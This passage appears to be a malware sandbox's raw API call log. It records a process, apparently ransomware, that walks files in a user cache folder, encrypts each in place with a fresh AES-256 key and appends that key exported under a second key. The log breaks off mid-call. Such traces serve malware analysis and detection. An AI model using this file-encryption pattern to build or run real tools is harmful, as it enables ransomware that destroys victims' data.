dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.941] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.941] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.942] CloseHandle (hObject=0x198) returned 1 [0145.959] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.963] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.963] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.963] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x80) returned 1 [0145.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.964] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=400) returned 1 [0145.964] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=400) returned 1 [0145.964] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.964] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.965] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.965] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.965] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.965] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.965] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0145.965] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.965] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0145.965] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.965] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0145.965] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.965] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.966] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.966] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.966] CloseHandle (hObject=0x198) returned 1 [0145.982] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.987] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.987] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.987] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", dwFileAttributes=0x80) returned 1 [0145.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.988] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=430) returned 1 [0145.988] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=430) returned 1 [0145.988] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.988] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.989] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.989] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.989] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.989] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.989] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1ae, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1ae, lpOverlapped=0x0) returned 1 [0145.989] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.989] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0145.989] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.989] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0145.989] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.989] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.989] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.990] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.990] CloseHandle (hObject=0x198) returned 1 [0146.007] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.011] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.011] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.012] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", dwFileAttributes=0x80) returned 1 [0146.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.012] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0146.012] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0146.012] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.012] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.013] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.013] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.013] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.013] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.014] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0146.014] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.014] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.014] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.014] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.014] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.014] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.014] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.014] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.014] CloseHandle (hObject=0x198) returned 1 [0146.040] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.044] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.045] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.045] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.045] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.045] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", dwFileAttributes=0x80) returned 1 [0146.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.045] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0146.046] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0146.046] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.046] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.047] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.047] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.047] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.047] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.047] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0146.047] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.047] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.047] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.047] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.047] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.048] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.048] CloseHandle (hObject=0x198) returned 1 [0146.068] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.074] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.074] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.074] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.074] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.074] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", dwFileAttributes=0x80) returned 1 [0146.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.075] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=400) returned 1 [0146.076] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=400) returned 1 [0146.076] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.076] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.076] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.077] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.077] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.077] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.077] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.077] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.077] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.077] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.077] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.077] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.078] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.078] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.078] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.078] CloseHandle (hObject=0x198) returned 1 [0146.099] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.104] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.104] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.104] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.104] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", dwFileAttributes=0x80) returned 1 [0146.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.106] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=398) returned 1 [0146.106] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=398) returned 1 [0146.106] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.106] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.106] SetFilePointer (in: hFile=0x198, 